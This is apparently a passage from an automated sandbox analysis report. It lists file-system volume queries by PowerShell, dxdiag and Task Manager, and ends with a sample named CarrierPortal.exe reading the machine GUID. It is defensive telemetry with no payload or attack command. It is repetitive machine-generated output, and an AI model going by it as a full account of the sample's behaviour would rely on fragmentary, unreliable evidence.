Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.3208.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.3448.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.3448.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\dxdiag.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0516~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\dxdiag.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0110~31bf3856ad364e35~amd64~~10.0.19041.3271.cat VolumeInformation
Source: C:\Windows\System32\dxdiag.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0110~31bf3856ad364e35~amd64~~10.0.19041.3271.cat VolumeInformation
Source: C:\Windows\System32\Taskmgr.exeQueries volume information: C:\ProgramData\Microsoft\User Account Pictures\user.png VolumeInformation
Source: C:\Windows\System32\Taskmgr.exeQueries volume information: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Assets\SmallLogo.scale-100.png VolumeInformation
Source: C:\Windows\System32\Taskmgr.exeQueries volume information: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\Assets\Icons\AppListIcon.scale-100.png VolumeInformation
Source: C:\Windows\System32\Taskmgr.exeQueries volume information: C:\Windows\System32\RuntimeBroker.exe VolumeInformation
Source: C:\Windows\System32\Taskmgr.exeQueries volume information: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\Assets\Icons\AppListIcon.scale-100.png VolumeInformation
Source: C:\Windows\System32\Taskmgr.exeQueries volume information: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Assets\SmallLogo.scale-100.png VolumeInformation
Source: C:\Windows\System32\Taskmgr.exeQueries volume information: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Assets\SquareLogo44x44.scale-100.png VolumeInformation
Source: C:\Windows\System32\Taskmgr.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\StoreAppList.scale-100.png VolumeInformation
Source: C:\Windows\System32\Taskmgr.exeQueries volume information: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Assets\SquareLogo44x44.scale-100.png VolumeInformation
Source: C:\Users\user\Desktop\CarrierPortal.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

